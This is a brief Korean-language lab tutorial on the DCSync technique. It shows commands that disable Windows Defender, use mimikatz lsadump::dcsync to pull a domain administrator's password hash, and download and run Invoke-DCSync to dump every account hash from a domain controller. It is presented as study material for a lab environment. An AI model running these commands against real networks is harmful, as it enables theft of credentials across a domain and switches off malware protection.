
Invoke-DCSync
Invoke-DCSync 참고: https://adsecurity.org/?p=1729 참고: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ 목표: mimikatz DCSync 기능을 사용하여 도메인 컨트롤러에 있는 모든 사용자 계정의 비밀번호 해시를 검색합니다.
경고: 랩 환경에서만 수행하십시오.
mimikatz는 DCSync라는 도구를 구현했습니다. 이를 통해 mimikatz는 도메인 컨트롤러를 가장하여 다른 도메인 컨트롤러에서 모든 비밀번호 해시를 검색할 수 있습니다.
Windows Defender를 비활성화해야 할 수도 있습니다.
관리자 권한으로 PowerShell을 열고 다음을 입력하세요.
$ Set-MpPreference -DisableRealtimeMonitoring $true
mimikatz 시작
$ lsadump::dcsync /domain:test.local /user:Administrator
이제 해당 사용자의 비밀번호 해시를 확보했습니다.
이 작업에는 관리자 액세스 권한, 특히 Get-Replication-Changes-All Common Name 특성이 필요합니다.
Invoke-DCSync 모듈을 사용하여 모든 해시를 추출할 수 있습니다.
다운로드: https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat